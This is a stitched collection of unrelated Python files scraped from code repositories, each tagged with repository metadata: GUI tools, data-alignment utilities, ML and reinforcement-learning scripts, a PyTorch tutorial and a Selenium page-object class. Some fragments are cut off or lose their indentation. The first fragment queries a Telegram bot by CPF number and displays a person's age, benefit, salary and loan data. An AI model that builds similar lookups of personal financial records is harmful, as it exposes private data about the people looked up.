for widget in frame_card.winfo_children():
widget.destroy()
for widget in frame_mgconsig.winfo_children():
widget.destroy()
for widget in frame_mgcard.winfo_children():
widget.destroy()
cpf = cpf_entry.get()
consulta = client.send_message('ConsignadoBot', cpf)
while consulta.out is not True:
time.sleep(1)
file = open("respostas.txt", "r")
resposta_file = file.readlines()
file.close()
print(resposta_file)
i = 0
for l in resposta_file:
if 'VERMELHO' in l:
update = 'VERMELHO'
vermelho = Label(frame_semafaro, bg="red")
vermelho.place(height=25, width=25)
if 'AMARELO' in l:
update = 'AMARELO'
amarelo = Label(frame_semafaro, bg="yellow")
vermelho.place(height=25, width=25)
if 'VERDE' in l:
update = 'VERDE'
verde = Label(frame_semafaro, bg="green")
verde.place(height=25, width=25)
if 'NOME:' in l:
nome = re.search(r'NOME:(.*)', l).group(1)
nome_plc = Label(frame_nome, text=nome)
nome_plc.grid(row=0, column=1, sticky=EW)
elif 'IDADE:' in l:
split = l.split(' // ')
age = re.search('IDADE:(.*)', split[0]).group(1)
idade = int(age)
cidade = re.search('CIDADE:(.*)', split[1]).group(1)
beneficio = re.search('BENEFÍCIO:(.*)', split[2]).group(1)
salario = re.search('SALÁRIO:(.*)', split[3]).group(1)
bancos = re.search('BANCOS:(.*)', split[4]).group(1)
quantidade = re.search('QNT:(.*)', split[5]).group(1)
qnt = int(quantidade)
card = re.search('CARTÃO:(.*)', split[6]).group(1)
mg_consig = re.search('MG. CONSIG:(.*)', split[7]).group(1)
mg_card = re.search('MG. CARD:(.*)', split[8]).group(1)
if idade < 75:
idade_plc = Label(frame_idade, text=idade, borderwidth=1, relief="groove")
idade_plc.grid(row=i + 1, column=0, sticky=EW)
elif idade > 75:
idade_plc = Label(frame_idade, text=idade, borderwidth=1, relief="groove", bg='red')
idade_plc.grid(row=i + 1, column=0, sticky=EW)
benef_plc = Label(frame_nbenef, text=beneficio, borderwidth=1, relief="groove")
benef_plc.grid(row=i + 1, column=0, sticky=EW)
agencia_plc = Label(frame_cidade, text=cidade, borderwidth=1, relief="groove")
agencia_plc.grid(row=i + 1, column=0, sticky=EW)
wckToolTips.register(agencia_plc, cidade)
salario_plc = Label(frame_salario, text=salario, borderwidth=1, relief="groove")
salario_plc.grid(row=i + 1, column=0, sticky=EW)
wckToolTips.register(salario_plc, salario)
bancos_plc = Label(frame_bancos, text=bancos, borderwidth=1, relief="groove")
bancos_plc.grid(row=i + 1, column=0, sticky=EW)
wckToolTips.register(bancos_plc, bancos)
if qnt >= 9:
qnt_plc = Label(frame_qnt, text=qnt, borderwidth=1, relief="groove", bg='red')
qnt_plc.grid(row=i + 1, column=0, sticky=EW)
elif qnt < 9:
qnt_plc = Label(frame_qnt, text=qnt, borderwidth=1, relief="groove")
qnt_plc.grid(row=i + 1, column=0, sticky=EW)
card_plc = Label(frame_card, text=card, borderwidth=1, relief="groove")
card_plc.grid(row=i + 1, column=0, sticky=EW)
wckToolTips.register(card_plc, card)
mgconsig_plc = Label(frame_mgconsig, text=mg_consig, borderwidth=1, relief="groove")
mgconsig_plc.grid(row=i + 1, column=0, sticky=EW)
mgcard_plc = Label(frame_mgcard, text=mg_card, borderwidth=1, relief="groove")
mgcard_plc.grid(row=i + 1, column=0, sticky=EW)
i += 1
file = open("respostas.txt", 'w')
file.write('')
file.close()
cpf_btn = Button(frame_cpf, text='Consultar', command=send_telegram)
cpf_btn.place(relx=0.72, rely=0.055)
def main():
try:
while True:
root.update()
root.minsize(750, 300)
root.maxsize(1920, 300)
except KeyboardInterrupt:
pass
except tkinter.TclError as e:
if 'application has been destroyed' not in e.args[0]:
raise
finally:
client.disconnect()
client.loop.run_until_complete(main())
| moisesfelipee/Telegram | Local.py | Local.py | py | 10,113 | python | en | code | 1 | github-code | 90 |
18331491719 | import bisect
N=int(input())
L=list(map(int,input().split()))
L=sorted(L)
ans=0
for i in range(N-1):
for k in range(i+1,N-1):
a=L[i]+L[k]
b=bisect.bisect_left(L,a)
ans=ans+(b-k-1)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02888/s165675557.py | s165675557.py | py | 222 | python | en | code | 0 | github-code | 90 |
28398838159 | """
This module contains methods to make it easy to align pandas objects that have time series indexes.
"""
from typing import Callable, Optional, Union
import numpy as np
import pandas as pd
from aika.time.utilities import _get_index, _get_index_level
from aika.utilities.pandas_utils import IndexTensor, Level, Tensor
def _reindex_by_level(tensor: Tensor, level: Optional[Level]) -> Tensor:
"""
This helper function returns a copy of tesnor where the index of tensor has been reduced to the single
level given by level.
"""
index = _get_index_level(tensor, level)
if index.duplicated().any():
raise ValueError(
"data must not contain any duplicated index values on the relevant level"
)
tensor = tensor.copy()
tensor.index = index
return tensor
def _shorten_data(tensor: Tensor, contemp: bool, last_ts: pd.Timestamp):
"""
Removes any data from tensor that is after the last time stamp.
"""
try:
return tensor.loc[
tensor.index <= last_ts if contemp else tensor.index < last_ts
]
except TypeError as e:
raise ValueError(
"This error almost always results from mixing timezone naive and timezone aware datetimes."
) from e
def causal_match(
data: Tensor,
index: IndexTensor,
contemp: bool = False,
data_level: Optional[Level] = None,
index_level: Optional[Level] = None,
fill_limit: Optional[int] = None,
) -> Tensor:
"""
This will align data onto an index. The index can be a dataframe or series but only the index is used. This will
return the data aligned onto the index.
Parameters
----------
data: IndexTensor
This is a pandas object that we want to align onto the index. The data must not contain any duplicated
index values on the relevant level, i.e. must be unstacked.
index: IndexTensor
This is pandas object that represents the target index.
contemp: bool
This variable says whether an index value in the data index is an exact match is "causally available"
in the alignment. Roughly equivalent to the semantics of np.searchsorted "side" semantics with True == "left".
data_level :
If data is multi-Indexed, the level on which to align.
index_level :
If index is multi-Indexed, the level on which to align.
fill_limit :
The number of times a single row of data in "data" can be re-used as the value for "index". E.g., if the
index is daily and the data is weekly on monday, a value of 0 means only monday will have data.
Returns
-------
IndexTensor : The data object reindexed to have the same index as `index`
"""
target_index = _get_index_level(index, index_level)
if target_index.empty:
# result will be empty but this will preserve level names.
return data.reindex(_get_index(index))
unique_target_index = target_index.drop_duplicates()
data = _reindex_by_level(data, data_level)
# because of the semantics of search sorted we must remove any rows in the data that come after
# the final entry in the target index.
data = _shorten_data(data, contemp, unique_target_index[-1])
data.index = unique_target_index[
np.searchsorted(
unique_target_index, data.index, side="left" if contemp else "right"
).astype(int)
]
# if there were multiple rows of data that align onto the same target index value, we want to keep only
# the final row ....
data = data[~data.index.duplicated(keep="last")]
# .... and reindex to put any duplication back so that the final index is identical to the target.
data = data.reindex(
target_index,
copy=False,
**(
{
"method": None,
}
if fill_limit == 0
else {"method": "ffill", "limit": fill_limit}
)
)
data.index = _get_index(index)
return data
def causal_resample(
data: Tensor,
index: IndexTensor,
agg_method: Union[str, Callable],
contemp: bool = False,
data_level: Optional[Level] = None,
index_level: Optional[Level] = None,
) -> Tensor:
"""
This will resample data onto an index. The index can be a dataframe or series but only the index is used.
This will return the data aligned onto the index.
Parameters
----------
data: IndexTensor
This is a pandas object that we want to align onto the index. The data must not contain any duplicated
index values on the relevant level, i.e. must be unstacked.
index: IndexTensor
This is pandas object that represents the target index.
agg_method:
The aggregation method used in the resampling. This is most commonly "last", note that in pandas
the semantics of "last" are the last non-nan value in the resampling window, which is different from
getting the last row.
contemp: bool
This variable says whether an index value in the data index is an exact match is "causally available"
in the alignment. Roughly equivalent to the semantics of np.searchsorted "side" semantics with True == "left".
data_level :
If data is multi-Indexed, the level on which to align.
index_level :
If index is multi-Indexed, the level on which to align.
Returns
-------
IndexTensor : The data object reindexed to have the same index as `index`
"""
target_index = _get_index_level(index, index_level)
if target_index.empty:
# returns an empty version of the tensor with indexes preserved.
result = data.iloc[:0]
result.index = target_index
return result
data = _reindex_by_level(data, data_level)
unique_target_index = target_index.drop_duplicates()
data = _shorten_data(data, contemp, unique_target_index[-1])
grouper = np.searchsorted(
unique_target_index, data.index, side="left" if contemp else "right"
)
result = data.groupby(grouper).aggregate(agg_method)
result.index = unique_target_index[grouper].drop_duplicates()
result = result.reindex(target_index)
result.index = _get_index(index)
return result
| phil20686/aika | libs/time/src/aika/time/alignment.py | alignment.py | py | 6,247 | python | en | code | 2 | github-code | 90 |
70491599337 | import numpy as np
from matplotlib import pyplot as plt
# %matplotlib inline
from dle.inference import load_image, rescale, crop_center, normalize
import matplotlib.patches as patches
import json
# img = load_image('http://images.cocodataset.org/val2017/000000397133.jpg')
# plt.imshow(img)
all_box = np.load('SSD_Lap_0.5_box.npy').item()
all_class = np.load('SSD_Lap_0.5_class.npy').item()
all_score = np.load('SSD_Lap_0.5_score.npy').item()
for J in all_box.keys():
K = J[14:]
img = load_image('./val2017/'+K)
img = rescale(img, 300, 300)
img = crop_center(img, 300, 300)
img = normalize(img)
# plt.imshow(img)
out = img/2+0.5
# plt.imshow(out)
# img.shape
bboxes = all_box.get(J)
classes = all_class.get(J)
confidences = all_score.get(J)
best = np.argwhere(confidences > 0.3).squeeze()
if K == '000000560011.jpg' or K == '000000223188.jpg' or K == '000000045070.jpg' or K == '000000157213.jpg' or K == '000000131386.jpg' or K =='000000364636.jpg':
continue
print(K)
json_file = './annotations/instances_val2017.json'
with open(json_file,'r') as COCO:
js = json.loads(COCO.read())
class_names = [ category['name'] for category in js['categories'] ]
fig,ax = plt.subplots(1)
ax.imshow(out)
for idx in best:
left, top, right, bottom = bboxes[idx]
x, y, w, h = [val*300 for val in [left, top, right-left, bottom-top]]
rect = patches.Rectangle((x, y),w,h,linewidth=1,edgecolor='r',facecolor='none')
ax.add_patch(rect)
ax.text(x, y, class_names[classes[idx]-1], bbox=dict(facecolor='white', alpha=0.5))
# plt.show()
plt.savefig(K)
| zejiangh/Filter-GaP | DET/detection_plot.py | detection_plot.py | py | 1,610 | python | en | code | 30 | github-code | 90 |
28793652227 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: pytorch
# language: python
# name: python3
# ---
# ## Tensors Operations
#
# Tensors are the building block of all PyTotch operations.\
# At its core, PyTorch is a library for processing tensors. A tensor is a number, vector, matrix, or any n-dimensional array. Let's create a tensor with a single number.\
# \
# `Note`: all elements of a tensors require same data type.
#
#%%
import torch
a = torch.tensor(4.)
print(a.shape) # note: a is a scalar, there is no dimension to scalars.
a.dtype
#%%
v = torch.tensor([4., 5, 6, 7]) # all of the tensors are set to the same data type
print(v.dtype)
v
v = torch.tensor([1, 2, 3, 4, 5, 6])
print(v[2:5]) # print items in indexies 2,3,4
v = torch.tensor([1, 2, 3, 4, 5, 6])
print(v[2:]) # print from index 2 until the end
v = torch.arange(2, 7) # create a vector of 2,3 .. 6 => tensor([2, 3, 4, 5, 6])
v = torch.arange(2, 7, 2) # create a vector => tensor([2, 4, 6])
v
x = torch.arange(18).view(3, 2, 3) # create a 3D matrix
print(x[1, 0:1, 1:2]) # slice from matrix 1, row 0:1, column 1:2 (excluded)
print(x[1, :, :]) # slice from matrix 1, all, all column 1:2 (excluded)
x
v = torch.FloatTensor([1, 2, 3, 4, 5, 6]) # create a float tensor
print(v.dtype)
v = torch.FloatTensor([1, 2, 3, 4, 5, 6]) # create a float tensor
print(v.view(3, 2)) # rearange to a (3, 2) matrix
v = torch.FloatTensor([1, 2, 3, 4, 5, 6]) # create a float tensor
print(v.view(3, -1)) # -1 => infer the number of columns, rearange to a (3, 2) matrix,
# Vector Operations
# +
v1 = torch.tensor([1, 2, 3]) # create a vector of [1, 2, 3]
v2 = torch.tensor([1, 2, 3]) # create a vector of [1, 2, 3]
v1 * v2 # element wise multiplication => tensor([1, 4, 9])
v1 * 5 # multiply by scalar => tensor([ 5, 10, 15])
torch.dot(v1, v2) # dot product, v1[0] * v2[0] + v1[1] * v2[1] ... + v1[n] * v2[n] => 14
torch.linspace(0, 10, 5) # dive the spcae of 0:10 to 5 piceses => tensor([ 0.0000, 2.5000, 5.0000, 7.5000, 10.0000])
# +
x = torch.linspace(0, 10, 100) # dive the spcae of 0:10 to 100 piceses
y = torch.exp(x) # y = exponent of x
import matplotlib.pyplot as plt
plt.plot(x.numpy(), y.numpy())
# +
import matplotlib.pyplot as plt
# x = torch.arange(0, 1000., 1)
x = torch.linspace(0, 10, 100)
y1 = torch.exp(x)
y2 = torch.exp(torch.max(x) - x)
figure, axis = plt.subplots(1, 2)
axis[0].plot(x, y1)
axis[0].set_title("exp(x)")
# For Cosine Function
axis[1].plot(x, y2)
axis[1].set_title("max(x) = x")
# Combine all the operations and display
plt.show()
# -
torch.arange(18)
ms = torch.arange(18).view(3, 3, 2)
print(ms)
print('max:', torch.max(ms))
print(ms[1, 1:2, 0:2])
# +
x = torch.linspace(0, 10, 100)
y1 = torch.exp(x)
y2 = torch.exp(torch.max(x) - x)
plt.plot(x.numpy(), y1.numpy())
plt.plot(x.numpy(), y2.numpy())
# -
v = torch.tensor([1, 2, 3, 4, 5, 6]) # create a float tensor
print(v.size())
m = torch.tensor([[5., 6],
[7, 8],
[9, 10]])
print(m.shape)
m
a = torch.tensor([0, 3, 5, 5, 5, 2]).view(2, 3) # create a matrix of dim(2,3)
b = torch.tensor([3, 4, 3, -2, 4, -2]).view(3, 2) # create a matrix of dim(3, 2)
print(a @ b) # multiply a and b
print(torch.matmul(a, b)) # multiply a and b
# `Note`: matrix dimension must be kept on all rows and columns
d3 = torch.tensor([
[[111, 112, 113],
[121, 122, 123]],
[[211, 212, 213],
[221, 222, 223.]]])
print(d3.shape)
d3
# ## Tensor operations and gradients
# We can combine tensors with the usual arithmetic operations. Let's look at an example:
# create tensors.
x = torch.tensor(3.)
w = torch.tensor(4., requires_grad=True)
b = torch.tensor(5., requires_grad=True)
x, w, b
# We've created three tensors: `x`, `w`, and `b`, all numbers. `w` and `b` have an additional parameter `requires_grad` set to `True`. We'll see what it does in just a moment.
#
# Let's create a new tensor `y` by combining these tensors.
# arithmetic operations
y = w * x + b
y
# As expected, `y` is a tensor with the value `3 * 4 + 5 = 17`. What makes PyTorch unique is that we can automatically compute the derivative of `y` w.r.t. the tensors that have `requires_grad` set to `True` i.e. w and b. This feature of PyTorch is called _autograd_ (automatic gradients).
#
# To compute the derivatives, we can invoke the `.backward` method on our result `y`.
# compute derivatives
y.backward()
# The derivatives of `y` with respect to the input tensors are stored in the `<tensor>.grad` property of the respective tensors.
# display gradients, x = 3, w = 4, b = 5
print('dy/dx:', x.grad) # we didn't defined x with gradiant
print('dy/dw:', w.grad) # the gradient of y with respect of w => w * 1 + 0 = 3
print('dy/db:', b.grad) # the gradient of y with respect of b => w * 0 + 1 = 1 (we trait b as the variable of the derivitve)
# As expected, `dy/dw` has the same value as `x`, i.e., `3`, and `dy/db` has the value `1`. Note that `x.grad` is `None` because `x` doesn't have `requires_grad` set to `True`.
#
# The "grad" in `w.grad` is short for _gradient_, which is another term for derivative. The term _gradient_ is primarily used while dealing with vectors and matrices.
| tsemach/ai-course | 01-tensors-introduction/01-tensors-introduction.py | 01-tensors-introduction.py | py | 5,407 | python | en | code | 0 | github-code | 90 |
27000293708 | # -*- coding:utf-8 -*-
'''
说明:
在matplotlib基础上的画图模块
'''
import matplotlib.pyplot as plt;
#设置figure的中文显示
#黑体 SimHei
#微软雅黑 Microsoft YaHei
#微软正黑体 Microsoft JhengHei
#新宋体 NSimSun
#新细明体 PMingLiU
#细明体 MingLiU
#标楷体 DFKai-SB
#仿宋 FangSong
#楷体 KaiTi
#仿宋_GB2312 FangSong_GB2312
#楷体_GB2312 KaiTi_GB2312
def set_ch():
from pylab import mpl
mpl.rcParams['font.sans-serif']=['SimHei'] # 指定默认字体
mpl.rcParams['axes.unicode_minus']=False # 解决保存图像是负号'-'显示为方块的问题
#画图的曲线
class Plot(object):
def __init__(self,x=[],y=[],label='',color='black',linestyle='solid',linewidth=1):
self.xarray=x;
self.yarray=y;
self.label=label;
self.color=color;
#'solid'实线,'dashed'虚线
self.linestyle=linestyle;
self.linewidth=linewidth;
#坐标轴标签属性
class AxisLabel(object):
def __init__(self,name='axis',fontsize=10):
self.name=name;
self.fontsize=fontsize;
#坐标轴上下限
class AxisLim(object):
def __init__(self,min,max):
self.min=min;
self.max=max;
#x,y坐标轴
class Axis(object):
def __init__(self,label,lim,ticks,rotation=0):
self.label=label;
self.lim=lim;
self.ticks=ticks;
self.rotation=rotation;
#axe的position
class AxePosition(object):
def __init__(self,axe,row,column,position):
self.axe=axe;
self.row=row;
self.column=column;
self.position=position;
#画图
class Draw2DFigure(object):
#初始化figure,将figure分割为row*column个axe
def __init__(self,row=1,column=1):
self.fig=plt.figure();
self.axes=[];
for i in range(1,row*column+1):
self.set_axe_position(row,column,i);
#设置axe在画布中的位置
def set_axe_position(self,row,column,position):
axe=self.fig.add_subplot(row,column,position);
self.axes.append(AxePosition(axe,row,column,position));
#画曲线图
def draw_plot(self,row,column,position,xaxis,yaxis,pts,title=''):
for a in self.axes:
if a.row==row and a.column==column and a.position==position:
self.__set_xaxis(a.axe,xaxis);
self.__set_yaxis(a.axe,yaxis);
a.axe.set_title(title);
for pt in pts:
a.axe.plot(pt.xarray,pt.yarray,label=pt.label,
color=pt.color,linewidth=pt.linewidth,
linestyle=pt.linestyle);
#显示最终画图
#upper right <--> 1
#upper left <--> 2
#lower left <--> 3
#lower right <--> 4
#right <--> 5
#center left <--> 6
#center right <--> 7
#lower center <--> 8
#upper center <--> 9
#center <--> 10
def show_figure(self,location=1):
plt.legend(loc=location);
plt.show();
#设置axe的x轴
def __set_xaxis(self,axe,xaxis):
axe.set_xlabel(xaxis.label.name,fontsize=xaxis.label.fontsize);
axe.set_xlim(xaxis.lim.min,xaxis.lim.max);
axe.xaxis.set_ticks(xaxis.ticks);
if xaxis.rotation!=0:
rotation=xaxis.rotation;
for label in axe.xaxis.get_ticklabels():
label.set_rotation(rotation);
#设置axe的y轴
def __set_yaxis(self,axe,yaxis):
axe.set_ylabel(yaxis.label.name,fontsize=yaxis.label.fontsize);
axe.set_ylim(yaxis.lim.min,yaxis.lim.max);
axe.yaxis.set_ticks(yaxis.ticks);
if yaxis.rotation!=0:
rotation=yaxis.rotation;
for label in axe.yaxis.get_ticklabels():
label.set_rotation(rotation);
| hitosky/python_script | figure/drawfigure.py | drawfigure.py | py | 3,283 | python | en | code | 0 | github-code | 90 |
23650880553 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
import wx
from proxy_server import (
ServerManager,
q,
IP,
PORT
)
import time
from wx.adv import TaskBarIcon
import images
import requests
from wx.lib.agw import infobar
import getpass
import threading
from wx.lib.delayedresult import startWorker
class TaskBarIcon(TaskBarIcon):
ID = wx.NewId()
def __init__(self, frame):
wx.adv.TaskBarIcon.__init__(self)
self.frame = frame
self.SetIcon(wx.Icon(images.icon.GetIcon()))
# override
def CreatePopupMenu(self):
self.frame.Raise()
class MyWin(wx.Frame):
def __init__(self, parent, title):
super(MyWin, self).__init__(parent, title=title, size=(800, 200))
self.SetMinSize((800, 200))
self.msg = ''
self.init_ui()
self.Centre()
self.Show()
self.SetIcon(images.icon.GetIcon())
self.job_id = 1
def init_ui(self):
self.task_bar_icon = TaskBarIcon(self)
self.Bind(wx.adv.EVT_TASKBAR_CLICK, self.on_task_bar_left_dclick)
panel = wx.Panel(self)
sizer = wx.GridBagSizer(0, 0)
font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
font.PointSize = 16
self.SetFont(font)
download_url = wx.StaticText(panel, label="游戏文件下载地址:")
download_url.SetFont(font)
sizer.Add(download_url, pos=(0, 0), flag=wx.ALL, border=10)
self.tc1 = wx.TextCtrl(panel, style=wx.TE_MULTILINE | wx.TE_READONLY)
sizer.Add(self.tc1, pos=(0, 1), flag=wx.EXPAND | wx.ALL, border=5)
sizer.AddGrowableCol(1)
sizer.AddGrowableRow(0)
panel.SetSizerAndFit(sizer)
hint_msg = wx.StaticText(panel, size=(200, 100), label="提示:\r通过第三方下载工具将文件下载至\r/Users/{}/Downloads".format(getpass.getuser()))
sizer.Add(hint_msg, pos=(0, 2), flag=wx.ALL, border=5)
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_timer, self.timer)
self.timer.Start(500)
self.Bind(wx.EVT_CLOSE, self.on_exit)
self.statusbar = self.CreateStatusBar()
self.statusbar.SetFieldsCount(2)
self.SetStatusWidths([-1, 330])
self.statusbar.SetStatusText('Starting proxy server on {} port {}'.format(IP, PORT), 0)
def check_download_pkg(self):
url = self.msg
urls = '{}'.format(url)
_url = url.split('.pkg')[0]
no = int(_url[-2:])
for i in xrange(1, 10):
next_url = '{}{:0>2d}.pkg'.format(_url[:-2], no + i)
resp = requests.head(next_url, timeout=10)
if resp.status_code == 200:
urls += '\r\n{}'.format(next_url)
else:
break
return urls
def on_clicked(self, event):
if self.msg != '':
self.btn1.Enable(False)
self.tc2.SetValue('查询中请稍后。。。。。。_(:з」∠)_')
startWorker(self._resultConsumer, self._resultProducer, jobID=self.job_id)
def _resultConsumer(self, delayedResult):
job_id = delayedResult.getJobID()
assert job_id == self.job_id
try:
result = delayedResult.get()
except Exception as e:
return
self.tc2.SetValue(result)
self.btn1.Enable(True)
def _resultProducer(self):
urls = self.check_download_pkg()
return urls
def on_timer(self, event):
try:
msg = q.get(block=False)
if type(msg) is str:
self.msg = msg
self.tc1.SetValue(msg)
elif msg == 48:
self.statusbar.SetStatusText('Error: Address already in use: ({}, {}).'.format(IP, PORT))
dlg = wx.MessageDialog(self, 'Address already in use: ({}, {}).'.format(IP, PORT), 'Error:', wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
elif type(msg) is list:
if msg[0] == 200:
self.statusbar.SetStatusText(msg[1], 1)
except Exception as e:
pass
def on_exit(self, event):
p.terminate()
time.sleep(0.1)
wx.Exit()
def on_task_bar_left_dclick(self, event):
self.frame.Show(True)
self.frame.Raise()
if __name__ == '__main__':
p_server = ServerManager()
app = wx.App()
my_win = MyWin(None, 'PS4 download helper (alpha)')
p = multiprocessing.Process(target=p_server.start)
p.start()
app.MainLoop()
| FuriousSlade/PS4DownloadHepler | ui.py | ui.py | py | 4,578 | python | en | code | 0 | github-code | 90 |
45203418798 | import gym
from random import randint
import numpy as np
# Crear el entorno MountainCar-v0
env = gym.make('MountainCar-v0')
def discretizar(valor):
estado=np.array(valor[0][:2])
low=env.observation_space.low
high=env.observation_space.high
aux=((estado-low)/(high-low))*20
return tuple(aux.astype(np.int32))
q_table = np.random.uniform(low=-1, high=1, size=[20, 20, 3])
tasa_aprendizaje = 0.1
factor_descuento = 0.95
episodios=5000
listados_recompensas=[]
# Ciclo principal
for episodio in range (episodios):
final = False
recompensa_total=0
estado =discretizar(env.reset())
while not final:
if randint(0,10)>2:
accion=np.argmax(q_table[estado])
else:
accion = randint(0, 2)
nuevo_estado, recompensa, final, truncated, info = env.step(accion)
q_table[estado][accion] = q_table[estado][accion] + tasa_aprendizaje * \
(recompensa + factor_descuento *
np.max(q_table[discretizar([nuevo_estado])]) - q_table[estado][accion])
estado=discretizar([nuevo_estado])
recompensa_total+=recompensa
# Renderizar el entorno
if(episodio+1)%500==0:
env.render()
listados_recompensas.append(recompensa_total)
if (episodio+1)%100==0:
print(f"Episodio {episodio+1} - Recompensa: {np.mean(listados_recompensas)}")
# Cerrar el entorno
env.close()
| edwinscastrob/IA | Algoritmos/Qlearning.py | Qlearning.py | py | 1,425 | python | es | code | 0 | github-code | 90 |
16516293012 | #!/usr/bin/env python3
# dataset: https://www.kaggle.com/lehaknarnauli/spotify-datasets
import json
import time
import numpy
import numpy as np
from regtree.tree import RandomForest
from utils import load_data_from_csv
def check(
train,
test,
feedback: bool,
trees: int,
samples: int,
max_depth: int,
attr_incl: float,
):
print(f"Starting training on {len(train)} data samples")
print(f"= Feedback {'enabled' if feedback else 'disabled'}")
print(f"= Forest size: {trees}")
print(f"= Sample size: {samples}")
print(f"= Max depth: {max_depth}")
print(f"= Attribute inclusion: {attr_incl}")
tic = time.perf_counter()
forest = RandomForest()
forest.fit(feedback, train, trees, samples, max_depth, attr_incl, False)
# with open('json_data.json') as file:
# forest = RandomForest.from_dict(json.load(file))
tac = time.perf_counter()
print(f"Finished training in: {round(tac - tic, 1)}s")
print()
print(f"Starting testing on {len(test)} data samples")
tic = time.perf_counter()
p = forest.perform(test, False)
tac = time.perf_counter()
# with open('json_data.json', 'w') as outfile:
# outfile.write(forest.to_json())
print(f"Finished testing in: {round(tac - tic, 1)}s")
print(f"Avg. error: {round(p, 1)}")
p2 = forest.predict(
np.array([0, 248973, 0.605, 0.882, 9, -3.028, 0, 0.029, 0.0000313, 0.614, 0.135, 0.418, 140.026, 4]))
print(f"Predicted: {p2}")
def main():
# index 0 is the value, the rest are the attributes
a = load_data_from_csv("data/tracks_processed_fix.csv")
# remove entries with less than 1950 in the first column
a = a[a[:, 0] >= 1950]
# remove outliers based on standard deviation in all columns
# for i in range(1, len(a[0])):
# mean = np.mean(a[:, i])
# std = np.std(a[:, i])
# a = a[np.abs(a[:, i] - mean) < 3 * std]
# sort by year
a = a[a[:, 0].argsort()]
# group by year
a = np.split(a, np.where(np.diff(a[:, 0]))[0] + 1)
# ensure that each year has the same number of entries by oversampling
for i in range(len(a)):
b = np.random.choice(a[i].shape[0], 2500, replace=True)
a[i] = a[i][b]
# flatten
a = np.concatenate(a)
# shuffle the data
np.random.shuffle(a)
# split the data into training and testing
dataset_len = len(a)
training_size = 0.6
testing_size = 0.07
training = a[: int(dataset_len * training_size)]
testing = a[int(dataset_len * training_size): int(dataset_len * (testing_size + training_size))]
# Model testing
check(training, testing, True, 50, 5000, 10, 0.34)
print("\n=======================\n")
if __name__ == "__main__":
main()
| RouNNdeL/uma-projekt | spotify.py | spotify.py | py | 2,802 | python | en | code | 0 | github-code | 90 |
20163500081 | #-*-coding: UTF-8 -*-
'''
Created on 2019年12月9日
@author: LIJY
'''
from selenium.webdriver.remote.webdriver import WebDriver
import time
from futurn_loan.common.mylogging import mylogging
from futurn_loan.common.basepath import screenshot_path
import os
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import traceback
from selenium.webdriver.common.action_chains import ActionChains
class BasePage():
def __init__(self,driver:WebDriver):
self.driver = driver
# 等待元素可见
def wait_until_visible(self,ele_loc,img_doc,timeout = 10,poll_fre=0.5):
mylogging.info("等待{}元素出现...",img_doc)
start_time = time.time()
try:
WebDriverWait(self.driver,timeout,poll_fre).until(EC.visibility_of_any_elements_located, ele_loc)
except:
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("等待{}元素可见,耗时{}...".format(img_doc,dur_time))
# 查询元素是否存在
def wait_until_exist(self,ele_loc,img_doc,timeout = 10,poll_fre=0.5):
mylogging.info("等待{}元素出现...",img_doc)
start_time = time.time()
try:
WebDriverWait(self.driver,timeout,poll_fre).until(EC.presence_of_element_located, ele_loc)
except:
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("等待{}元素存在,耗时{}...".format(img_doc,dur_time))
def get_ele(self,ele_loc,img_doc):
mylogging.info("获取元素{}开始...".format(img_doc))
start_time = time.time()
try:
ele = self.driver.find_element(*ele_loc)
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
# 获取成功,记录时间,记录日志,返回元素
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("获取{}元素,耗时{}...".format(img_doc,dur_time))
return ele
def input_text(self,ele_loc,text,img_doc):
mylogging.info("{}输入文字{}开始...".format(img_doc,text))
start_time = time.time()
# 等待元素可见,获取元素
self.wait_until_visible(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
ele.send_keys(text)
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("获取{}元素,耗时{}...".format(img_doc,dur_time))
def ele_click(self,ele_loc,img_doc):
mylogging.info("点击元素{}开始...".format(img_doc))
start_time = time.time()
# 等待元素可见,获取元素
self.wait_until_visible(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
ele.click()
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("点击{}元素,耗时{}...".format(img_doc,dur_time))
def get_text(self,ele_loc,img_doc):
mylogging.info("获取{}元素txt开始...".format(img_doc))
start_time = time.time()
# 等待元素可见,获取元素
self.wait_until_visible(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
text = ele.text
except:
# 获取失败,写日志,截图,抛出异常
debug_logging = "**********ele_loc".format(ele_loc)
mylogging.error(debug_logging)
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("获取{}元素text,耗时{}...".format(img_doc,dur_time))
return text
# 获取元素的属性值
def get_attr(self,ele_loc,attr,img_doc):
mylogging.info("获取{}元素{}参数开始...".format(img_doc,attr))
start_time = time.time()
self.wait_until_exist(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
attr = ele.get_attribute(attr)
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("获取{}元素值为{}耗时{}...".format(img_doc,attr,dur_time))
return attr
def is_btn_enabled(self,ele_loc,img_doc):
# 返回按钮是否可用
mylogging.info("判断元素{}是否可用开始...".format(img_doc))
start_time = time.time()
self.wait_until_exist(ele_loc, img_doc)
